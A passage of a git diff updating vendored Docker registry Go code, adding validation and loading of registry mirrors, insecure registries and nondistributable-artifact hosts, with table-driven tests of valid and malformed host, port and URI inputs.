-func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) { - mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror) - insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName) - - flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") - flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") - - options.installCliPlatformFlags(flags) -} - // newServiceConfig returns a new instance of ServiceConfig -func newServiceConfig(options ServiceOptions) *serviceConfig { +func newServiceConfig(options ServiceOptions) (*serviceConfig, error) { config := &serviceConfig{ ServiceConfig: registrytypes.ServiceConfig{ InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0), - IndexConfigs: make(map[string]*registrytypes.IndexInfo, 0), + IndexConfigs: make(map[string]*registrytypes.IndexInfo), // Hack: Bypass setting the mirrors to IndexConfigs since they are going away // and Mirrors are only for the official registry anyways. - Mirrors: options.Mirrors, }, V2Only: options.V2Only, } + if err := config.LoadAllowNondistributableArtifacts(options.AllowNondistributableArtifacts); err != nil { + return nil, err + } + if err := config.LoadMirrors(options.Mirrors); err != nil { + return nil, err + } + if err := config.LoadInsecureRegistries(options.InsecureRegistries); err != nil { + return nil, err + } + + return config, nil +} + +// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries into config. 
+func (config *serviceConfig) LoadAllowNondistributableArtifacts(registries []string) error { + cidrs := map[string]*registrytypes.NetIPNet{} + hostnames := map[string]bool{} + + for _, r := range registries { + if _, err := ValidateIndexName(r); err != nil { + return err + } + if validateNoScheme(r) != nil { + return fmt.Errorf("allow-nondistributable-artifacts registry %s should not contain '://'", r) + } + + if _, ipnet, err := net.ParseCIDR(r); err == nil { + // Valid CIDR. + cidrs[ipnet.String()] = (*registrytypes.NetIPNet)(ipnet) + } else if err := validateHostPort(r); err == nil { + // Must be `host:port` if not CIDR. + hostnames[r] = true + } else { + return fmt.Errorf("allow-nondistributable-artifacts registry %s is not valid: %v", r, err) + } + } + + config.AllowNondistributableArtifactsCIDRs = make([]*(registrytypes.NetIPNet), 0) + for _, c := range cidrs { + config.AllowNondistributableArtifactsCIDRs = append(config.AllowNondistributableArtifactsCIDRs, c) + } + + config.AllowNondistributableArtifactsHostnames = make([]string, 0) + for h := range hostnames { + config.AllowNondistributableArtifactsHostnames = append(config.AllowNondistributableArtifactsHostnames, h) + } + + return nil +} + +// LoadMirrors loads mirrors to config, after removing duplicates. +// Returns an error if mirrors contains an invalid mirror. +func (config *serviceConfig) LoadMirrors(mirrors []string) error { + mMap := map[string]struct{}{} + unique := []string{} + + for _, mirror := range mirrors { + m, err := ValidateMirror(mirror) + if err != nil { + return err + } + if _, exist := mMap[m]; !exist { + mMap[m] = struct{}{} + unique = append(unique, m) + } + } + + config.Mirrors = unique - config.LoadInsecureRegistries(options.InsecureRegistries) + // Configure public registry since mirrors may have changed. 
+ config.IndexConfigs[IndexName] = ®istrytypes.IndexInfo{ + Name: IndexName, + Mirrors: config.Mirrors, + Secure: true, + Official: true, + } - return config + return nil } // LoadInsecureRegistries loads insecure registries to config @@ -109,7 +173,7 @@ func (config *serviceConfig) LoadInsecureRegistries(registries []string) error { originalIndexInfos := config.ServiceConfig.IndexConfigs config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0) - config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0) + config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo) skip: for _, r := range registries { @@ -120,6 +184,19 @@ skip: config.ServiceConfig.IndexConfigs = originalIndexInfos return err } + if strings.HasPrefix(strings.ToLower(r), "http://") { + logrus.Warnf("insecure registry %s should not contain 'http://' and 'http://' has been removed from the insecure registry config", r) + r = r[7:] + } else if strings.HasPrefix(strings.ToLower(r), "https://") { + logrus.Warnf("insecure registry %s should not contain 'https://' and 'https://' has been removed from the insecure registry config", r) + r = r[8:] + } else if validateNoScheme(r) != nil { + // Insecure registry should not contain '://' + // before returning err, roll back to original data + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return fmt.Errorf("insecure registry %s should not contain '://'", r) + } // Check if CIDR was passed to --insecure-registry _, ipnet, err := net.ParseCIDR(r) if err == nil { @@ -134,6 +211,12 @@ skip: config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data) } else { + if err := validateHostPort(r); err != nil { + config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs + config.ServiceConfig.IndexConfigs = originalIndexInfos + return fmt.Errorf("insecure registry %s is not valid: %v", r, err) + + } // Assume `host:port` if 
not CIDR. config.IndexConfigs[r] = ®istrytypes.IndexInfo{ Name: r, @@ -155,6 +238,25 @@ skip: return nil } +// allowNondistributableArtifacts returns true if the provided hostname is part of the list of registries +// that allow push of nondistributable artifacts. +// +// The list can contain elements with CIDR notation to specify a whole subnet. If the subnet contains an IP +// of the registry specified by hostname, true is returned. +// +// hostname should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name +// or an IP address. If it is a domain name, then it will be resolved to IP addresses for matching. If +// resolution fails, CIDR matching is not performed. +func allowNondistributableArtifacts(config *serviceConfig, hostname string) bool { + for _, h := range config.AllowNondistributableArtifactsHostnames { + if h == hostname { + return true + } + } + + return isCIDRMatch(config.AllowNondistributableArtifactsCIDRs, hostname) +} + // isSecureIndex returns false if the provided indexName is part of the list of insecure registries // Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs. // @@ -173,10 +275,17 @@ func isSecureIndex(config *serviceConfig, indexName string) bool { return index.Secure } - host, _, err := net.SplitHostPort(indexName) + return !isCIDRMatch(config.InsecureRegistryCIDRs, indexName) +} + +// isCIDRMatch returns true if URLHost matches an element of cidrs. URLHost is a URL.Host (`host:port` or `host`) +// where the `host` part can be either a domain name or an IP address. If it is a domain name, then it will be +// resolved to IP addresses for matching. If resolution fails, false is returned. +func isCIDRMatch(cidrs []*registrytypes.NetIPNet, URLHost string) bool { + host, _, err := net.SplitHostPort(URLHost) if err != nil { - // assume indexName is of the form `host` without the port and go on. 
- host = indexName + // Assume URLHost is of the form `host` without the port and go on. + host = URLHost } addrs, err := lookupIP(host) @@ -193,42 +302,45 @@ func isSecureIndex(config *serviceConfig, indexName string) bool { // Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined. for _, addr := range addrs { - for _, ipnet := range config.InsecureRegistryCIDRs { + for _, ipnet := range cidrs { // check if the addr falls in the subnet if (*net.IPNet)(ipnet).Contains(addr) { - return false + return true } } } - return true + return false } // ValidateMirror validates an HTTP(S) registry mirror func ValidateMirror(val string) (string, error) { uri, err := url.Parse(val) if err != nil { - return "", fmt.Errorf("%s is not a valid URI", val) + return "", fmt.Errorf("invalid mirror: %q is not a valid URI", val) } - if uri.Scheme != "http" && uri.Scheme != "https" { - return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme) + return "", fmt.Errorf("invalid mirror: unsupported scheme %q in %q", uri.Scheme, uri) } - - if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" { - return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI") + if (uri.Path != "" && uri.Path != "/") || uri.RawQuery != "" || uri.Fragment != "" { + return "", fmt.Errorf("invalid mirror: path, query, or fragment at end of the URI %q", uri) } - - return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil + if uri.User != nil { + // strip password from output + uri.User = url.UserPassword(uri.User.Username(), "xxxxx") + return "", fmt.Errorf("invalid mirror: username/password not allowed in URI %q", uri) + } + return strings.TrimSuffix(val, "/") + "/", nil } // ValidateIndexName validates an index name. 
func ValidateIndexName(val string) (string, error) { - if val == reference.LegacyDefaultHostname { - val = reference.DefaultHostname + // TODO: upstream this to check to reference package + if val == "index.docker.io" { + val = "docker.io" } if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") { - return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val) + return "", fmt.Errorf("invalid index name (%s). Cannot begin or end with a hyphen", val) } return val, nil } @@ -241,6 +353,30 @@ func validateNoScheme(reposName string) error { return nil } +func validateHostPort(s string) error { + // Split host and port, and in case s can not be splitted, assume host only + host, port, err := net.SplitHostPort(s) + if err != nil { + host = s + port = "" + } + // If match against the `host:port` pattern fails, + // it might be `IPv6:port`, which will be captured by net.ParseIP(host) + if !validHostPortRegex.MatchString(s) && net.ParseIP(host) == nil { + return fmt.Errorf("invalid host %q", host) + } + if port != "" { + v, err := strconv.Atoi(port) + if err != nil { + return err + } + if v < 0 || v > 65535 { + return fmt.Errorf("invalid port %q", port) + } + } + return nil +} + // newIndexInfo returns IndexInfo configuration from indexName func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) { var err error @@ -275,13 +411,14 @@ func GetAuthConfigKey(index *registrytypes.IndexInfo) string { // newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) { - index, err := newIndexInfo(config, name.Hostname()) + index, err := newIndexInfo(config, reference.Domain(name)) if err != nil { return nil, err } - official := !strings.ContainsRune(name.Name(), '/') + official := !strings.ContainsRune(reference.FamiliarName(name), '/') + return &RepositoryInfo{ - Named: name, + Name: 
reference.TrimNamed(name), Index: index, Official: official, }, nil diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go index 25578a7f2b..30a257e325 100644 --- a/vendor/github.com/docker/docker/registry/config_test.go +++ b/vendor/github.com/docker/docker/registry/config_test.go @@ -1,13 +1,138 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "reflect" + "sort" + "strings" "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestLoadAllowNondistributableArtifacts(t *testing.T) { + testCases := []struct { + registries []string + cidrStrs []string + hostnames []string + err string + }{ + { + registries: []string{"1.2.3.0/24"}, + cidrStrs: []string{"1.2.3.0/24"}, + }, + { + registries: []string{"2001:db8::/120"}, + cidrStrs: []string{"2001:db8::/120"}, + }, + { + registries: []string{"127.0.0.1"}, + hostnames: []string{"127.0.0.1"}, + }, + { + registries: []string{"127.0.0.1:8080"}, + hostnames: []string{"127.0.0.1:8080"}, + }, + { + registries: []string{"2001:db8::1"}, + hostnames: []string{"2001:db8::1"}, + }, + { + registries: []string{"[2001:db8::1]:80"}, + hostnames: []string{"[2001:db8::1]:80"}, + }, + { + registries: []string{"[2001:db8::1]:80"}, + hostnames: []string{"[2001:db8::1]:80"}, + }, + { + registries: []string{"1.2.3.0/24", "2001:db8::/120", "127.0.0.1", "127.0.0.1:8080"}, + cidrStrs: []string{"1.2.3.0/24", "2001:db8::/120"}, + hostnames: []string{"127.0.0.1", "127.0.0.1:8080"}, + }, + + { + registries: []string{"http://mytest.com"}, + err: "allow-nondistributable-artifacts registry http://mytest.com should not contain '://'", + }, + { + registries: []string{"https://mytest.com"}, + err: "allow-nondistributable-artifacts registry https://mytest.com should not contain '://'", + }, + { + registries: []string{"HTTP://mytest.com"}, + err: "allow-nondistributable-artifacts registry HTTP://mytest.com should not 
contain '://'", + }, + { + registries: []string{"svn://mytest.com"}, + err: "allow-nondistributable-artifacts registry svn://mytest.com should not contain '://'", + }, + { + registries: []string{"-invalid-registry"}, + err: "Cannot begin or end with a hyphen", + }, + { + registries: []string{`mytest-.com`}, + err: `allow-nondistributable-artifacts registry mytest-.com is not valid: invalid host "mytest-.com"`, + }, + { + registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`}, + err: `allow-nondistributable-artifacts registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`, + }, + { + registries: []string{`mytest.com:500000`}, + err: `allow-nondistributable-artifacts registry mytest.com:500000 is not valid: invalid port "500000"`, + }, + { + registries: []string{`"mytest.com"`}, + err: `allow-nondistributable-artifacts registry "mytest.com" is not valid: invalid host "\"mytest.com\""`, + }, + { + registries: []string{`"mytest.com:5000"`}, + err: `allow-nondistributable-artifacts registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`, + }, + } + for _, testCase := range testCases { + config := emptyServiceConfig + err := config.LoadAllowNondistributableArtifacts(testCase.registries) + if testCase.err == "" { + if err != nil { + t.Fatalf("expect no error, got '%s'", err) + } + + var cidrStrs []string + for _, c := range config.AllowNondistributableArtifactsCIDRs { + cidrStrs = append(cidrStrs, c.String()) + } + + sort.Strings(testCase.cidrStrs) + sort.Strings(cidrStrs) + if (len(testCase.cidrStrs) > 0 || len(cidrStrs) > 0) && !reflect.DeepEqual(testCase.cidrStrs, cidrStrs) { + t.Fatalf("expect AllowNondistributableArtifactsCIDRs to be '%+v', got '%+v'", testCase.cidrStrs, cidrStrs) + } + + sort.Strings(testCase.hostnames) + sort.Strings(config.AllowNondistributableArtifactsHostnames) + if (len(testCase.hostnames) > 0 || 
len(config.AllowNondistributableArtifactsHostnames) > 0) && !reflect.DeepEqual(testCase.hostnames, config.AllowNondistributableArtifactsHostnames) { + t.Fatalf("expect AllowNondistributableArtifactsHostnames to be '%+v', got '%+v'", testCase.hostnames, config.AllowNondistributableArtifactsHostnames) + } + } else { + if err == nil { + t.Fatalf("expect error '%s', got no error", testCase.err) + } + if !strings.Contains(err.Error(), testCase.err) { + t.Fatalf("expect error '%s', got '%s'", testCase.err, err) + } + } + } +} + func TestValidateMirror(t *testing.T) { valid := []string{ "http://mirror-1.com", + "http://mirror-1.com/", "https://mirror-1.com", + "https://mirror-1.com/", "http://localhost", "https://localhost", "http://localhost:5000", @@ -21,15 +146,14 @@ func TestValidateMirror(t *testing.T) { invalid := []string{ "!invalid!://%as%", "ftp://mirror-1.com", - "http://mirror-1.com/", "http://mirror-1.com/?q=foo", "http://mirror-1.com/v1/", "http://mirror-1.com/v1/?q=foo", "http://mirror-1.com/v1/?q=foo#frag", "http://mirror-1.com?q=foo", "https://mirror-1.com#frag", - "https://mirror-1.com/", "https://mirror-1.com/#frag", + "http://foo:bar@mirror-1.com/", "https://mirror-1.com/v1/", "https://mirror-1.com/v1/#", "https://mirror-1.com?q", @@ -47,3 +171,211 @@ func TestValidateMirror(t *testing.T) { } } } + +func TestLoadInsecureRegistries(t *testing.T) { + testCases := []struct { + registries []string + index string + err string + }{ + { + registries: []string{"127.0.0.1"}, + index: "127.0.0.1", + }, + { + registries: []string{"127.0.0.1:8080"}, + index: "127.0.0.1:8080", + }, + { + registries: []string{"2001:db8::1"}, + index: "2001:db8::1", + }, + { + registries: []string{"[2001:db8::1]:80"}, + index: "[2001:db8::1]:80", + }, + { + registries: []string{"http://mytest.com"}, + index: "mytest.com", + }, + { + registries: []string{"https://mytest.com"}, + index: "mytest.com", + }, + { + registries: []string{"HTTP://mytest.com"}, + index: "mytest.com", + }, + { + 
registries: []string{"svn://mytest.com"}, + err: "insecure registry svn://mytest.com should not contain '://'", + }, + { + registries: []string{"-invalid-registry"}, + err: "Cannot begin or end with a hyphen", + }, + { + registries: []string{`mytest-.com`}, + err: `insecure registry mytest-.com is not valid: invalid host "mytest-.com"`, + }, + { + registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`}, + err: `insecure registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`, + }, + { + registries: []string{`mytest.com:500000`}, + err: `insecure registry mytest.com:500000 is not valid: invalid port "500000"`, + }, + { + registries: []string{`"mytest.com"`}, + err: `insecure registry "mytest.com" is not valid: invalid host "\"mytest.com\""`, + }, + { + registries: []string{`"mytest.com:5000"`}, + err: `insecure registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`, + }, + } + for _, testCase := range testCases { + config := emptyServiceConfig + err := config.LoadInsecureRegistries(testCase.registries) + if testCase.err == "" { + if err != nil { + t.Fatalf("expect no error, got '%s'", err) + } + match := false + for index := range config.IndexConfigs { + if index == testCase.index { + match = true + } + } + if !match { + t.Fatalf("expect index configs to contain '%s', got %+v", testCase.index, config.IndexConfigs) + } + } else { + if err == nil { + t.Fatalf("expect error '%s', got no error", testCase.err) + } + if !strings.Contains(err.Error(), testCase.err) { + t.Fatalf("expect error '%s', got '%s'", testCase.err, err) + } + } + } +} + +func TestNewServiceConfig(t *testing.T) { + testCases := []struct { + opts ServiceOptions + errStr string + }{ + { + ServiceOptions{}, + "", + }, + { + ServiceOptions{ + Mirrors: []string{"example.com:5000"}, + }, + `invalid mirror: unsupported scheme "example.com" in "example.com:5000"`, + }, + { + ServiceOptions{ + Mirrors: 
[]string{"http://example.com:5000"}, + }, + "", + }, + { + ServiceOptions{ + InsecureRegistries: []string{"[fe80::]/64"}, + }, + `insecure registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`, + }, + { + ServiceOptions{ + InsecureRegistries: []string{"102.10.8.1/24"}, + }, + "", + }, + { + ServiceOptions{ + AllowNondistributableArtifacts: []string{"[fe80::]/64"}, + }, + `allow-nondistributable-artifacts registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`, + }, + { + ServiceOptions{ + AllowNondistributableArtifacts: []string{"102.10.8.1/24"}, + }, + "", + }, + } + + for _, testCase := range testCases { + _, err := newServiceConfig(testCase.opts) + if testCase.errStr != "" { + assert.Check(t, is.Error(err, testCase.errStr)) + } else { + assert.Check(t, err) + } + } +} + +func TestValidateIndexName(t *testing.T) { + valid := []struct { + index string + expect string + }{ + { + index: "index.docker.io", + expect: "docker.io", + }, + { + index: "example.com", + expect: "example.com", + }, + { + index: "127.0.0.1:8080", + expect: "127.0.0.1:8080", + }, + { + index: "mytest-1.com", + expect: "mytest-1.com", + }, + { + index: "mirror-1.com/v1/?q=foo", + expect: "mirror-1.com/v1/?q=foo", + }, + } + + for _, testCase := range valid { + result, err := ValidateIndexName(testCase.index) + if assert.Check(t, err) { + assert.Check(t, is.Equal(testCase.expect, result)) + } + + } + +} + +func TestValidateIndexNameWithError(t *testing.T) { + invalid := []struct { + index string + err string + }{ + { + index: "docker.io-", + err: "invalid index name (docker.io-). Cannot begin or end with a hyphen", + }, + { + index: "-example.com", + err: "invalid index name (-example.com). Cannot begin or end with a hyphen", + }, + { + index: "mirror-1.com/v1/?q=foo-", + err: "invalid index name (mirror-1.com/v1/?q=foo-). 
Cannot begin or end with a hyphen", + }, + } + for _, testCase := range invalid { + _, err := ValidateIndexName(testCase.index) + assert.Check(t, is.Error(err, testCase.err)) + } +} diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go index d692e8ef50..20fb47bcae 100644 --- a/vendor/github.com/docker/docker/registry/config_unix.go +++ b/vendor/github.com/docker/docker/registry/config_unix.go @@ -1,10 +1,6 @@ // +build !windows -package registry - -import ( - "github.com/spf13/pflag" -) +package registry // import "github.com/docker/docker/registry" var ( // CertsDir is the directory where certificates are stored @@ -18,8 +14,3 @@ var ( func cleanPath(s string) string { return s } - -// installCliPlatformFlags handles any platform specific flags for the service. -func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { - flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries") -} diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go index d1b313dc1e..6de0508f87 100644 --- a/vendor/github.com/docker/docker/registry/config_windows.go +++ b/vendor/github.com/docker/docker/registry/config_windows.go @@ -1,11 +1,9 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "os" "path/filepath" "strings" - - "github.com/spf13/pflag" ) // CertsDir is the directory where certificates are stored @@ -18,8 +16,3 @@ var CertsDir = os.Getenv("programdata") + `\docker\certs.d` func cleanPath(s string) string { return filepath.FromSlash(strings.Replace(s, ":", "", -1)) } - -// installCliPlatformFlags handles any platform specific flags for the service. -func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) { - // No Windows specific flags. 
-} diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go index 8451d3f678..9268c3a4f0 100644 --- a/vendor/github.com/docker/docker/registry/endpoint_test.go +++ b/vendor/github.com/docker/docker/registry/endpoint_test.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "net/http" diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go index 6bcf8c935d..832fdb95a4 100644 --- a/vendor/github.com/docker/docker/registry/endpoint_v1.go +++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "crypto/tls" @@ -9,9 +9,9 @@ import ( "net/url" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/transport" registrytypes "github.com/docker/docker/api/types/registry" + "github.com/sirupsen/logrus" ) // V1Endpoint stores basic information about a V1 registry endpoint. 
@@ -67,9 +67,9 @@ func validateEndpoint(endpoint *V1Endpoint) error { return nil } -func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { +func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) *V1Endpoint { endpoint := &V1Endpoint{ - IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify), + IsSecure: tlsConfig == nil || !tlsConfig.InsecureSkipVerify, URL: new(url.URL), } @@ -77,8 +77,8 @@ func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, met // TODO(tiborvass): make sure a ConnectTimeout transport is used tr := NewTransport(tlsConfig) - endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...)) - return endpoint, nil + endpoint.client = HTTPClient(transport.NewTransport(tr, Headers(userAgent, metaHeaders)...)) + return endpoint } // trimV1Address trims the version off the address and returns the @@ -123,7 +123,7 @@ func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent strin return nil, err } - endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) + endpoint := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders) if err != nil { return nil, err } @@ -175,7 +175,7 @@ func (e *V1Endpoint) Ping() (PingResult, error) { Standalone: true, } if err := json.Unmarshal(jsonString, &info); err != nil { - logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err) + logrus.Debugf("Error unmarshaling the _ping PingResult: %s", err) // don't stop here. 
Just assume sane defaults } if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" { diff --git a/vendor/github.com/docker/docker/registry/errors.go b/vendor/github.com/docker/docker/registry/errors.go new file mode 100644 index 0000000000..5bab02e5e2 --- /dev/null +++ b/vendor/github.com/docker/docker/registry/errors.go @@ -0,0 +1,31 @@ +package registry // import "github.com/docker/docker/registry" + +import ( + "net/url" + + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/docker/errdefs" +) + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + +func translateV2AuthError(err error) error { + switch e := err.(type) { + case *url.Error: + switch e2 := e.Err.(type) { + case errcode.Error: + switch e2.Code { + case errcode.ErrorCodeUnauthorized: + return errdefs.Unauthorized(err) + } + } + } + + return err +} diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go index 17fa97ce3d..7a84bbfb7e 100644 --- a/vendor/github.com/docker/docker/registry/registry.go +++ b/vendor/github.com/docker/docker/registry/registry.go @@ -1,5 +1,5 @@ // Package registry contains client primitives to interact with a remote Docker registry. -package registry +package registry // import "github.com/docker/docker/registry" import ( "crypto/tls" @@ -13,10 +13,10 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/transport" "github.com/docker/go-connections/sockets" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" ) var ( @@ -81,7 +81,7 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { keyName := certName[:len(certName)-5] + ".key" logrus.Debugf("cert: %s", filepath.Join(directory, f.Name())) if !hasFile(fs, keyName) { - return fmt.Errorf("Missing key %s for client certificate %s. 
Note that CA certificates should use the extension .crt.", keyName, certName) + return fmt.Errorf("missing key %s for client certificate %s. Note that CA certificates should use the extension .crt", keyName, certName) } cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName)) if err != nil { @@ -102,8 +102,8 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error { return nil } -// DockerHeaders returns request modifiers with a User-Agent and metaHeaders -func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier { +// Headers returns request modifiers with a User-Agent and metaHeaders +func Headers(userAgent string, metaHeaders http.Header) []transport.RequestModifier { modifiers := []transport.RequestModifier{} if userAgent != "" { modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{ diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go index 21fc1fdcc7..bf17eb9fc7 100644 --- a/vendor/github.com/docker/docker/registry/registry_mock_test.go +++ b/vendor/github.com/docker/docker/registry/registry_mock_test.go @@ -1,6 +1,4 @@ -// +build !solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "encoding/json" @@ -17,11 +15,11 @@ import ( "testing" "time" + "github.com/docker/distribution/reference" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" "github.com/gorilla/mux" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( @@ -175,7 +173,7 @@ func makePublicIndex() *registrytypes.IndexInfo { return index } -func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig { +func makeServiceConfig(mirrors []string, insecureRegistries []string) (*serviceConfig, error) { options := ServiceOptions{ Mirrors: mirrors, InsecureRegistries: 
insecureRegistries, @@ -432,7 +430,7 @@ func handlerImages(w http.ResponseWriter, r *http.Request) { writeResponse(w, "", 204) return } - images := []map[string]string{} + var images []map[string]string for imageID, layer := range testLayers { image := make(map[string]string) image["id"] = imageID diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go index 786dfbed40..b7459471b3 100644 --- a/vendor/github.com/docker/docker/registry/registry_test.go +++ b/vendor/github.com/docker/docker/registry/registry_test.go @@ -1,19 +1,20 @@ -// +build !solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "fmt" "net/http" "net/http/httputil" "net/url" + "os" "strings" "testing" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" + "gotest.tools/assert" + "gotest.tools/skip" ) var ( @@ -33,7 +34,7 @@ func spawnTestRegistrySession(t *testing.T) *Session { } userAgent := "docker test client" var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log} - tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...) + tr = transport.NewTransport(AuthTransport(tr, authConfig, false), Headers(userAgent, nil)...) 
client := HTTPClient(tr) r, err := NewSession(client, authConfig, endpoint) if err != nil { @@ -54,6 +55,7 @@ func spawnTestRegistrySession(t *testing.T) *Session { } func TestPingRegistryEndpoint(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) { ep, err := NewV1Endpoint(index, "", nil) if err != nil { @@ -73,6 +75,7 @@ func TestPingRegistryEndpoint(t *testing.T) { } func TestEndpoint(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") // Simple wrapper to fail test if err != nil expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint { endpoint, err := NewV1Endpoint(index, "", nil) @@ -201,7 +204,7 @@ func TestGetRemoteImageLayer(t *testing.T) { func TestGetRemoteTag(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -211,7 +214,7 @@ func TestGetRemoteTag(t *testing.T) { } assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID) - bazRef, err := reference.ParseNamed("foo42/baz") + bazRef, err := reference.ParseNormalizedNamed("foo42/baz") if err != nil { t.Fatal(err) } @@ -223,7 +226,7 @@ func TestGetRemoteTag(t *testing.T) { func TestGetRemoteTags(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -235,7 +238,7 @@ func TestGetRemoteTags(t *testing.T) { assertEqual(t, tags["latest"], imageID, "Expected tag latest to map to "+imageID) assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID) - bazRef, err := reference.ParseNamed("foo42/baz") + bazRef, err := reference.ParseNormalizedNamed("foo42/baz") if err != nil { t.Fatal(err) } @@ -252,7 +255,7 @@ func TestGetRepositoryData(t *testing.T) { 
